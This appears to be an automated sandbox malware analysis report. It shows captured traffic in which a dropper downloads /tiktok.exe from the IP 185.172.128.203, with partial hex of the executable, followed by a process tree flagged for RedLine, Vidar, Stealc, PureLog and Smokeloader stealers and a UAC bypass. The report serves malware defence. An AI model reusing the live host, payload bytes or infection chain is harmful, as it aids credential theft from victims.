                                                                                                                                                                                                                            Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53
                                                                                                                                                                                                                            Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            8192.168.2.449756185.172.128.203803484C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.069597006 CEST76OUTGET /tiktok.exe HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.203
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309035063 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:41 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT
                                                                                                                                                                                                                            ETag: "85400-616de2c892480"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 545792
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309047937 CEST1289INData Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45
                                                                                                                                                                                                                            Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309113979 CEST1289INData Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58
                                                                                                                                                                                                                            Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309127092 CEST1289INData Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33
                                                                                                                                                                                                                            Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309150934 CEST1289INData Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3
                                                                                                                                                                                                                            Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309170961 CEST1289INData Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d
                                                                                                                                                                                                                            Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309185028 CEST1289INData Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52
                                                                                                                                                                                                                            Data Ascii: APb2|$vWGD$@PjGt=|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$|$8D$$D$4CD$$GhG6'@'@#(@(@*)@*)@
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309225082 CEST1289INData Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6
                                                                                                                                                                                                                            Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309242964 CEST1289INData Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc
                                                                                                                                                                                                                            Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.309276104 CEST1289INData Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00
                                                                                                                                                                                                                            Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.548446894 CEST1289INData Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e
                                                                                                                                                                                                                            Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:23:08:51
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\wxfSIz4PAi.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:460'289 bytes
                                                                                                                                                                                                                            MD5 hash:0A7871874DC7111B978E798F616211F9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1819490382.00000000071F2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:23:08:56
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\u5ek.0.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:312'320 bytes
                                                                                                                                                                                                                            MD5 hash:ACAAA65D3F174EBF3595E23522837B43
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:23:09:08
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"
                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                            File size:2'469'936 bytes
                                                                                                                                                                                                                            MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:23:09:09
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:23:09:09
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:23:09:12
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u5ek.3.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\u5ek.3.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:4'866'096 bytes
                                                                                                                                                                                                                            MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.1817573323.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 4%, ReversingLabs
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:23:09:12
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1564
                                                                                                                                                                                                                            Imagebase:0xe10000
                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:23:09:38
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            Imagebase:0xf10000
                                                                                                                                                                                                                            File size:262'432 bytes
                                                                                                                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:23:09:41
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                                                                                                                                                                                            Imagebase:0x27276ab0000
                                                                                                                                                                                                                            File size:59'721'128 bytes
                                                                                                                                                                                                                            MD5 hash:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.2111483520.0000027276AEB000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:23:09:42
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:23:09:42
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:23:09:42
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 2220
                                                                                                                                                                                                                            Imagebase:0xe10000
                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:23:09:42
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
                                                                                                                                                                                                                            Imagebase:0x6b0000
                                                                                                                                                                                                                            File size:545'792 bytes
                                                                                                                                                                                                                            MD5 hash:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:23:09:49
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"
                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                            File size:2'469'936 bytes
                                                                                                                                                                                                                            MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:23:09:50
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
